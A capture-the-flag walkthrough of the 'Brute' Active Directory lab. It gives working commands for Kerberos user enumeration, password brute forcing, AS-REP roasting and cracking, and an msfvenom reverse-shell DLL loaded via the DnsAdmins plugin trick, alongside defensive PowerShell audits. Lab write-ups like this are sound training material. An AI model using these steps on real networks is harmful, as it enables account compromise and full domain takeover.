CyberSecLabs "Brute" Walkthrough


Brute is the newest Active Directory release from CyberSecLabs.  In today's walkthrough we will be using a tool called Kerbrute to enumerate domain users, then perform an attack called AS-REP roasting, which takes advantage of Kerberos user accounts that don't require preauthentication.  Preauthentication is required in Active Directory environments by default.  In typical Microsoft fashion, they've included a per-user setting that allows this to be misconfigured: an account can be set to not require Kerberos preauthentication.  Finally, we will work on privilege escalation through a neat exploit that takes advantage of DNS administrative privileges.  So let's get started!

Scanning

We begin with scanning the target to determine what services and ports are available.

nmap 172.31.3.3

nmap -A 172.31.3.3

Once the scan is in we can immediately determine that we are working with an Active Directory machine.  We can see that the domain is brute.csl, which we should add to our /etc/hosts file.  Additionally, we know that Kerberos is present, which is a good opportunity to try to enumerate possible user accounts.  So let's get enumerating.

Enumeration

A tool called Kerbrute (located here) can be used to enumerate user accounts in the Active Directory environment.  I use the wordlists I host here on GitHub for Kerbrute, and you are welcome to use them or whichever list you would like.  Once you've installed Kerbrute we can get started.

kerbrute userenum --dc brute.csl -d brute.csl bruteusers.txt

You should receive several usernames in the results, which gives you a list of possible domain users.  We can take a couple of different paths from here.  One is to brute force username and password combinations, which you can see me do with Tess below.

kerbrute bruteuser --dc brute.csl -d brute.csl kerbrutepass.txt tess

This will however take some time.  As you see, the password list I used caught the password at #7390.  Alternatively we can use a tool called GetNPUsers.py to grab an AS-REP for the account (output as a crackable hash) that we can try to crack using John.

GetNPUsers.py -dc-ip 172.31.3.3 brute.csl/tess -no-pass
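From the defender's side, the two questions this section raises are which accounts have preauthentication disabled and whether anyone has been collecting AS-REPs for them.  The PowerShell below is an added example, not part of the walkthrough and not code from Kerbrute or Impacket; it assumes the ActiveDirectory RSAT module, a domain controller with the "Audit Kerberos Authentication Service" subcategory enabled, and the field names (PreAuthType, TargetUserName, IpAddress, TicketEncryptionType) as they appear in the 4768 event XML.

```powershell
# Added example: audit AS-REP roastable accounts and recent no-preauth TGT requests.
# Assumes the ActiveDirectory module (RSAT) and read access to the DC's Security log.
Import-Module ActiveDirectory

# 1. Accounts with "Do not require Kerberos preauthentication" set
#    (userAccountControl bit 0x400000, DONT_REQ_PREAUTH). These are the accounts
#    GetNPUsers.py and "kerbrute userenum" can obtain an AS-REP for without a password.
$roastable = Get-ADUser -Filter 'DoesNotRequirePreAuth -eq $true' `
                        -Properties DoesNotRequirePreAuth, PasswordLastSet, MemberOf
foreach ($u in $roastable) {
    # Group names only, so a privileged member (e.g. DnsAdmins) is obvious at a glance
    $groups = ($u.MemberOf | ForEach-Object { ($_ -split ',')[0] -replace '^CN=' }) -join ', '
    '{0,-20} enabled={1,-5} pwdLastSet={2:d} groups={3}' -f $u.SamAccountName, $u.Enabled, $u.PasswordLastSet, $groups
}

# 2. Event 4768 (TGT requested) with Pre-Authentication Type 0: the KDC issued an
#    AS-REP without any preauth exchange. TicketEncryptionType 0x17 (RC4) is the
#    variant that cracks fastest with john/hashcat.
$since  = (Get-Date).AddDays(-7)
$xpath  = "*[System[EventID=4768] and EventData[Data[@Name='PreAuthType']='0']]"
$asreps = Get-WinEvent -LogName Security -FilterXPath $xpath -ErrorAction SilentlyContinue |
    Where-Object { $_.TimeCreated -ge $since } |
    ForEach-Object {
        $d = @{}
        ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
        [pscustomobject]@{
            Time     = $_.TimeCreated
            Account  = $d['TargetUserName']
            ClientIP = $d['IpAddress'] -replace '^::ffff:', ''
            EncType  = $d['TicketEncryptionType']
        }
    }

# 3. One client address collecting AS-REPs for several accounts in a short window is
#    the wordlist-driven pattern shown above, not a normal workstation logon.
$asreps | Group-Object ClientIP | Sort-Object Count -Descending |
    Select-Object @{n='ClientIP';e={$_.Name}}, Count,
                  @{n='Accounts';e={($_.Group.Account | Sort-Object -Unique) -join ', '}},
                  @{n='RC4';e={($_.Group | Where-Object EncType -eq '0x17').Count}} |
    Format-Table -AutoSize

# 4. Fix: re-enable preauthentication. Drop -WhatIf once the list has been reviewed.
foreach ($u in $roastable) {
    Set-ADAccountControl -Identity $u -DoesNotRequirePreAuth $false -WhatIf
}
```

Step 1 is the ground truth: if that list is empty, neither GetNPUsers.py nor kerbrute's password-less path has anything to work with.  Step 3 is a heuristic and the window and threshold should be tuned to the environment; a service account that legitimately has preauthentication disabled will still produce a steady trickle of PreAuthType 0 events from its own hosts.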

Exploitation

John is able to crack AS-REP hashes pretty quickly.  Let's get to work on that.  Save your hash to a file and run john.  In this case, John's included password list makes quick work of it.

john tocrack

Now that we have a username and password we can try to log on to the machine.  We can use Evil-WinRM for this.

evil-winrm -i 172.31.3.3 -u tess -p password

It's important to check user privileges in any environment, especially an Active Directory one.  We can do this with net user, and we see that the Tess user is a DNS Admin for some reason.  Some quick research on exploiting DNS Admin users shows that members of the DnsAdmins group can change which plugin .dll the DNS server loads, including replacing a legitimate one with a malicious payload.  We need to first make our payload.  Keep in mind that you need to use an x64 payload in this instance for it to work correctly.  (My below image should have this and doesn't.)

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.0.7 LPORT=1234 -f dll > pwn.dll

We can then use Evil-WinRM's upload function to upload the payload to the machine.  Additionally we need to run the dnscmd command seen below to point the DNS server at our malicious payload.

upload pwn.dll; dnscmd /config /serverlevelplugindll C:\Users\Tess\Documents\pwn.dll

Once we have done this we need to open a netcat listener, then fire off a couple of additional commands to stop and start the DNS service.  Once we've done that we should get a reverse shell and own the machine.  From here you can grab user flags, modify or add users, access the server via RDP, and so much more.

Listener (bottom): nc -nlvp 1234; Evil-WinRM shell (top): sc.exe stop dns; sc.exe start dns
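The escalation above depends on two things an administrator can audit directly: who is in DnsAdmins, and whether the DNS server has a plugin DLL configured.  The PowerShell below is an added example, not part of the walkthrough; it assumes the ActiveDirectory RSAT module, that it runs on the DNS server (the registry check is local), and that the Security and System logs are readable.

```powershell
# Added example: audit DnsAdmins membership and the DNS server plugin DLL setting.
# Assumes the ActiveDirectory module (RSAT) and that this runs on the DNS server itself.
Import-Module ActiveDirectory

# 1. Who is in DnsAdmins (recursively)? Each of these accounts can make the DNS
#    service load an arbitrary DLL, so treat the group like Domain Admins.
Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
    Select-Object SamAccountName, objectClass, distinguishedName | Format-Table -AutoSize

# 2. Is a plugin DLL currently configured? This registry value is what
#    "dnscmd /config /serverlevelplugindll" writes.
$key = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
$dll = (Get-ItemProperty -Path $key -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
if ($dll) {
    "ServerLevelPluginDll = $dll"
    if (Test-Path $dll) {
        # A legitimate plugin is normally signed and lives under System32, not in a user profile
        Get-AuthenticodeSignature -FilePath $dll |
            Select-Object Status, @{n='Signer';e={$_.SignerCertificate.Subject}}
        Get-Item $dll | Select-Object FullName, LastWriteTime, Length
    } else {
        "configured DLL path does not exist on disk"
    }
} else {
    'ServerLevelPluginDll is not set'
}

# 3. Recent changes to watch for: DnsAdmins membership changes (4732, member added to a
#    security-enabled local group) and DNS Server service stop/start (7036 in System),
#    which together are the sequence used above.
$since = (Get-Date).AddDays(-7)
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4732; StartTime=$since} -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'DnsAdmins' } |
    Select-Object TimeCreated, @{n='Detail';e={($_.Message -split "`n")[0]}}
Get-WinEvent -FilterHashtable @{LogName='System'; Id=7036; StartTime=$since} -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -like '*DNS Server*' } |
    Select-Object TimeCreated, Message

# 4. Cleanup once a rogue value is confirmed: clear the setting, then restart the service.
# Remove-ItemProperty -Path $key -Name ServerLevelPluginDll
# Restart-Service -Name DNS
```

On a healthy domain controller step 2 should report that the value is not set; any path under a user's profile, as in the walkthrough, is a finding on its own regardless of what the file is.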

Final Thoughts

Brute is another example of how Microsoft "features" are vulnerable to attack due to the sheer amount of configuration required to make Active Directory function properly.  System administrators should take note that this attack is incredibly straightforward and fairly easy to conduct with easy-to-use tools and processes.  I hope you've learned something today, and I look forward to seeing you all again soon.
